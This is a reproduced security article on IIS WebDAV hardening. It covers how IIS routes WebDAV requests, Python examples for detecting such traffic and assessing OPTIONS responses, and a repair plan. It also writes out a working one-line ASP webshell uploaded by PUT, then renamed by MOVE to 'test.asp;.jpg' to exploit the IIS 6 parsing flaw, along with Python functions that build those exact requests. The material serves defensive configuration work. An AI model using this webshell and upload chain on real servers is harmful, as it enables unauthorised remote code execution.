This article is reproduced; the original address is: http://www.2cto.com/article/201307/228165.html
IIS WebDAV Security Configuration
2013-07-16 12:13:00 Author: sleepy dragon
0x00 Introduction
WebDAV is a communication protocol built on HTTP 1.1. It extends HTTP 1.1 by adding new methods alongside the standard ones such as GET, POST and HEAD.
An application can read and write files on the web server directly; the protocol supports locking (LOCK) and unlocking (UNLOCK) of files for writing, and can also support file version control.
IIS implements WebDAV through the ISAPI interface (of its two extension interfaces, CGI and ISAPI).
It does not use a script mapping, however: the main IIS program, w3svc.dll, itself contains the logic to recognize WebDAV traffic,
and once it identifies a request as WebDAV it calls the WebDAV processing module, httpext.dll.
Because the common methods GET, HEAD and POST are also served through ordinary mappings,
the request method alone cannot be used to decide whether a request is WebDAV; w3svc.dll decides based on request-header fields.
If the request carries a Translate:, If: or Lock-Token: header, it is treated as a WebDAV request.
Translate: is the header behind the well-known "Translate: f" source-code disclosure; the other two headers have the same effect.
Many IDSs lack this knowledge. w3svc.dll also has several other built-in methods, such as TRACK and TRACE.
TRACK is used for debugging: when such a request arrives, w3svc.dll returns the request data as-is,
much like the familiar ping.exe.
IIS does not log TRACK requests, so TRACK can be used to obtain the server banner;
for IIS this is quieter than the HEAD request everyone is used to.
If the method matches none of the above, w3svc.dll treats the request as WebDAV and hands it to httpext.dll.
These requests include the methods WebDAV supports: PROPFIND, PROPPATCH, MKCOL, DELETE, PUT, COPY, MOVE, LOCK, UNLOCK and so on.
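The routing rules above are exactly what an IDS or log-review script needs in order to spot WebDAV traffic that hides behind an ordinary GET or POST. The following is an added example, not code from the original article: it classifies raw HTTP requests the way the text says w3svc.dll does (debug methods first, then the three routing headers, then the WebDAV method list, with anything unrecognised falling through to httpext.dll). The sample requests are constructed for the example; the host name www.test.com is the one used elsewhere on this page and is not a real target.

```python
# Added example (not from the original article): classify raw HTTP requests following
# the w3svc.dll rules described in the text. Sample requests below are constructed.

# Methods w3svc.dll does not serve itself and hands to httpext.dll.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "DELETE", "PUT", "COPY",
                  "MOVE", "LOCK", "UNLOCK", "SEARCH"}
# Request headers that make w3svc.dll route a request to httpext.dll even when the
# method is an ordinary GET/HEAD/POST.
WEBDAV_HEADERS = ("translate", "if", "lock-token")
# Debug methods built into w3svc.dll; the text notes that IIS does not log TRACK.
DEBUG_METHODS = {"TRACK", "TRACE"}
ORDINARY_METHODS = {"GET", "HEAD", "POST", "OPTIONS"}


def parse_request_head(raw: bytes):
    """Split a raw HTTP request into (method, target, version, headers).
    Header names are lower-cased; each name maps to a list of values."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split()
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    method, target, version = parts
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, target, version, headers


def classify_request(raw: bytes):
    """Return (category, reason) for one raw request, in the order w3svc.dll checks."""
    method, _target, _version, headers = parse_request_head(raw)
    if method in DEBUG_METHODS:
        return "w3svc-debug", "%s echoes the request back; IIS does not log TRACK" % method
    present = [h for h in WEBDAV_HEADERS if h in headers]
    if present:
        if headers.get("translate", [""])[0].lower() == "f":
            note = "Translate: f source-disclosure pattern"
        else:
            note = "routed to httpext.dll because of the header"
        return "webdav", "%s with %s header(s); %s" % (method, ", ".join(present), note)
    if method in WEBDAV_METHODS:
        return "webdav", "%s is a WebDAV method handled by httpext.dll" % method
    if method in ORDINARY_METHODS:
        return "ordinary", "%s served through the normal mapping" % method
    # Per the text, anything else also falls through to httpext.dll.
    return "webdav", "unrecognised method %s is passed to httpext.dll" % method


# Constructed sample traffic: an ordinary GET, the same GET with Translate: f,
# a real WebDAV method, a TRACK banner grab, and a POST carrying an If: header.
SAMPLE_REQUESTS = [
    b"GET /default.asp HTTP/1.1\r\nHost: www.test.com\r\n\r\n",
    b"GET /default.asp HTTP/1.1\r\nHost: www.test.com\r\nTranslate: f\r\n\r\n",
    b"PROPFIND / HTTP/1.1\r\nHost: www.test.com\r\nDepth: 1\r\n\r\n",
    b"TRACK / HTTP/1.1\r\nHost: www.test.com\r\n\r\n",
    b"POST /upload.asp HTTP/1.1\r\nHost: www.test.com\r\nIf: (<opaquelocktoken:abc>)\r\n\r\n",
]


def classify_all(requests):
    """Classify a batch of raw requests; returns a list of (method, category, reason)."""
    out = []
    for raw in requests:
        method = parse_request_head(raw)[0]
        category, reason = classify_request(raw)
        out.append((method, category, reason))
    return out


if __name__ == "__main__":
    for method, category, reason in classify_all(SAMPLE_REQUESTS):
        print("%-8s %-12s %s" % (method, category, reason))
```

The point of the header check is the second sample: a plain GET for default.asp is "ordinary" until the Translate: f header is added, after which IIS hands it to httpext.dll even though nothing in the method or URL looks like WebDAV. A rule that only matches on PROPFIND/PUT/MOVE misses that case.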
0x01 Configuration
For security reasons, IIS does not enable WebDAV by default, so it must be enabled separately.
To enable WebDAV, open IIS Manager, expand the local computer, select Web Service Extensions, select WebDAV and click Allow.
Once WebDAV is enabled, IIS accepts PROPFIND, PROPPATCH, MKCOL, DELETE, PUT, COPY, MOVE, LOCK, UNLOCK and the other WebDAV methods.
When the IIS configuration also allows writing to a directory, files can be PUT directly, which can cause very serious security problems. It is strongly recommended to disable it.
0x02 Hazard
When WebDAV is enabled and IIS is configured with a writable directory, serious problems follow. WooYun has many reports of this misconfiguration, and when a group of foreign attackers compromised a batch of Chinese government sites, part of it was due to this configuration. The damage is huge and the operation is simple: scan in bulk, then upload a shell directly.
0x03 Find the problematic server
Send an OPTIONS request to the server:
OPTIONS / HTTP/1.1
Host: www.test.com
The response header returned is as follows:
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: DAV:sql
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private
When the Allow header lists the WebDAV methods above, WebDAV is enabled on the server (the DAV: 1,2 and MS-Author-Via: DAV headers say the same). Note the difference between the two method lists in this response: Public lists every method the server supports, while Allow lists what the requested resource currently permits. Here PUT appears in Public but not in Allow, so a PUT against / would be refused; on a directory with Write enabled, PUT shows up in Allow as well.
At that point PUT can be used to upload files, but executable script files cannot be uploaded directly. Upload a file of another type first, then MOVE it to a script file name.
PUT /test.txt HTTP/1.1
Host: www.test.com
Content-Length: 23
<%eval request("a")%>
With the WebDAV extension allowed and Write checked on the directory, a .txt file can be written. To rename it to a script suffix with MOVE, Script Resource Access must also be checked.
If the server also has the IIS 6 file-name parsing flaw, however, the file can be MOVEd to test.asp;.jpg, which IIS executes as ASP, giving a working shell:
MOVE /test.txt HTTP/1.1
Host: www.test.com
Destination: http://www.test.com/test.asp;.jpg
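The whole procedure in this section (OPTIONS to fingerprint, then PUT and MOVE) is easy to get wrong in two places: reading Allow where Public was meant, and sending a Content-Length that does not match the body. The following is an added example, not code from the original article: it parses an OPTIONS response and applies the article's test (WebDAV on, write methods permitted, PUT permitted), and builds the PUT and MOVE requests shown above with the Content-Length computed from the body. The first sample response copies the response quoted in this section; the other two are constructed, as are the host name and paths. It does not send anything; a practitioner would wire the outputs to http.client or a raw socket, and only against servers they are authorised to test.

```python
# Added example (not from the original article): assess an IIS OPTIONS response and
# build the PUT/MOVE requests from the text. Sample responses are constructed; the
# first one reproduces the response quoted in this section.

WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "DELETE", "PROPPATCH"}


def parse_response_head(raw: str):
    """Return (status_line, headers) with lower-cased header names."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def _method_list(value: str):
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def assess_options_response(raw: str) -> dict:
    """Apply the article's test. Public lists what the server supports; Allow lists
    what the requested resource permits, which is what an upload actually depends on."""
    status, h = parse_response_head(raw)
    allowed = _method_list(h.get("allow", ""))
    public = _method_list(h.get("public", ""))
    dav_enabled = ("dav" in h or h.get("ms-author-via", "").upper() == "DAV"
                   or bool(public & {"PROPFIND", "MKCOL", "LOCK"}))
    if not dav_enabled:
        verdict = "dav-off"
    elif "PUT" in allowed:
        verdict = "put-allowed"                 # Write is on: direct upload possible
    elif allowed & WRITE_METHODS:
        verdict = "dav-write-methods-exposed"   # e.g. MOVE/MKCOL/DELETE without PUT
    else:
        verdict = "dav-read-only"
    return {
        "status": status,
        "server": h.get("server", ""),
        "dav_enabled": dav_enabled,
        "dav_classes": h.get("dav", ""),
        "put_supported": "PUT" in public,
        "put_allowed": "PUT" in allowed,
        "write_allowed": sorted(allowed & WRITE_METHODS),
        "verdict": verdict,
    }


def build_put(host: str, path: str, body: bytes) -> bytes:
    """PUT request whose Content-Length matches the body exactly."""
    head = "PUT %s HTTP/1.1\r\nHost: %s\r\nContent-Length: %d\r\n\r\n" % (path, host, len(body))
    return head.encode("ascii") + body


def build_move(host: str, src_path: str, dest_url: str) -> bytes:
    """MOVE request renaming src_path to the Destination URL."""
    return ("MOVE %s HTTP/1.1\r\nHost: %s\r\nDestination: %s\r\n\r\n"
            % (src_path, host, dest_url)).encode("ascii")


# The response quoted in this section (WebDAV on, PUT supported but not permitted on /).
SAMPLE_IIS6_OPTIONS = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "MS-Author-Via: DAV\r\n"
    "Content-Length: 0\r\n"
    "Accept-Ranges: none\r\n"
    "DASL: DAV:sql\r\n"
    "DAV: 1,2\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\r\n"
    "Cache-Control: private\r\n"
    "\r\n"
)
# Constructed: the same server with the WebDAV extension prohibited.
SAMPLE_NO_DAV = (
    "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\nContent-Length: 0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\nPublic: OPTIONS, TRACE, GET, HEAD, POST\r\n\r\n"
)
# Constructed: a directory with Write checked, so PUT also appears in Allow.
SAMPLE_WRITABLE = SAMPLE_IIS6_OPTIONS.replace(
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY",
    "Allow: OPTIONS, TRACE, GET, HEAD, PUT, DELETE, COPY")


if __name__ == "__main__":
    for name, sample in (("quoted", SAMPLE_IIS6_OPTIONS), ("no-dav", SAMPLE_NO_DAV),
                         ("writable", SAMPLE_WRITABLE)):
        print(name, assess_options_response(sample)["verdict"])
    print(build_put("www.test.com", "/test.txt", b'<%eval request("a")%>').decode())
    print(build_move("www.test.com", "/test.txt", "http://www.test.com/test.asp;.jpg").decode())
```

Run after the repair plan below is applied, the same assessment should come back "dav-off" for every directory, or at worst "dav-read-only" on a WebDAV share that genuinely needs to stay up; any "put-allowed" or "dav-write-methods-exposed" result on an anonymous directory is the misconfiguration this article is about. Note that the Content-Length in the quoted PUT above is 23 for a 21-byte body; build_put computes it from the actual bytes so the server does not hang waiting for data that never arrives.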
There is also an open-source DAV management tool, DAV Explorer, which can be used to browse the server directly:
http://www.davexplorer.org/download.html
0x04 Repair plan
1. Disable WebDAV.
Under normal circumstances a website does not need the extra methods. In Web Service Extensions, right-click WebDAV and choose Prohibit.
2. If WebDAV is needed, add authentication and restrict permissions.
If Script Resource Access is checked, users can modify script files in the WebDAV folder, so leave it unchecked unless it is really required.
Besides the virtual-directory permissions, NTFS permissions also decide whether a user may access files in the WebDAV folder,
so give the folder appropriate NTFS permissions:
first set the Everyone group to Read only, then grant Write to individual users, for example the user "User".
Then choose how users are authenticated: open IIS Manager, right-click the WebDAV virtual directory, choose Properties → Directory Security, and click Edit under Authentication and access control.
Do not select Enable anonymous access, otherwise anonymous clients can write to the folder; choose a secure authentication method such as Integrated Windows Authentication.